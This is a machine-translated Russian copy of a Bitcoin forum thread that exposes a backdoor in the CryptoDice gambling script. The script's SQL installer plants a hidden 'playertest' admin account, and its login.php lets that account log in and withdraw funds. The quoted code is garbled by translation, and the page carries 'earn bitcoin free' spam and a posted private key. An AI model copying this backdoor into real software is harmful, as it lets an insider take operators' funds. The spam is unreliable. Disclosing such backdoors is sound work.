Вернуться   Биткоин Форум > Scam+
31 декабря 2014, 4:51:37 PM   # 1
 
 
Сообщений: 77
Цитировать по имени
цитировать ответ
по умолчанию Re: Доказательство Scam - felinegambler - CryptoDice и CryptoBlackjack

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Оригинальная тема



результат

CoinDice.sql устанавливает таблицу с именем "ga_players" с фактически учетной записью администратора под названием "playertest" по установке, вы поймете, почему это учетная запись администратора на следующей части.

Код:
DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `Id` INT (255) NOT NULL AUTO_INCREMENT,
  `Username` VARCHAR (20) СОРТ utf8_unicode_ci NOT NULL,
  `Passwd` текст КОПИЯМ utf8_unicode_ci NOT NULL,
  `Ga_token` текст СОРТ utf8_unicode_ci NOT NULL,
  ПЕРВИЧНЫЙ КЛЮЧ ( `id`)
) ДВИГАТЕЛЬ = InnoDB CHARSET = УМОЛЧАНИЮ utf8 СОЪЪАТ = utf8_unicode_ci;

INSERT INTO `` ga_players` (id`, `` username`, passwd`, `ga_token`) значения
(1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');

Когда я нашел это я посмотрел сценарий администратора для входа (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Сюрприз Сюрприз

если переменная $ _POST имеет какие-либо данные для "ga_playertest" она позволяет логин из "ga_players" таблица вместо таблицы администратора, который в этом случае держать наш поддельный администратор "playertest" - (1, 'playertest', '6d2aff483952d904179ca0c8c536a2c7', '');
Код:
если (! пусто ($ _ POST [ 'ga_playertest'])) {
    $ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` ga_players` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
  } Еще {
    $ This_admin = mysql_fetch_array (mysql_query ("ВЫБРАТЬ `` username`, ga_token` ОТ `` admins` ГДЕ username` =»".prot ($ _ POST [ 'hash_one'])."'И `passwd` ='".md5 ($ _ POST [ 'hash_sec'])."'LIMIT 1"));
  }

Это позволяет поддельный администратору войти в систему и выводить свои средства, пожалуйста, см решение ниже.

Решение

Не используй

или

Купить оригинальные копии johny1976'S, Если вы не знаете любой код, пожалуйста, задать разработчик опыта на этих форумах.

- CoinJack
- CoinDice

* Покупка оригинал также поддерживает развитие *
TechnoBibble сейчас офлайн Пожаловаться на TechnoBibble   Ответить с цитированием Мультицитирование сообщения от TechnoBibble Быстрый ответ на сообщение TechnoBibble


Как заработать Биткоины?
Без вложений. Не майнинг.


31 декабря 2014, 4:57:40 PM   # 2
 
 
Сообщения: 1288
Цитировать по имени
цитировать ответ
по умолчанию Re: Доказательство Scam - felinegambler - CryptoDice и CryptoBlackjack

Получил 1806 Биткоинов
Реальная история.





Большой улов, я оставил ему отрицательное доверие. Я действительно хочу, чтобы посмотреть, что он будет сказать, "защищать"  сам.
redsn0w сейчас офлайн Пожаловаться на redsn0w   Ответить с цитированием Мультицитирование сообщения от redsn0w Быстрый ответ на сообщение redsn0w



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW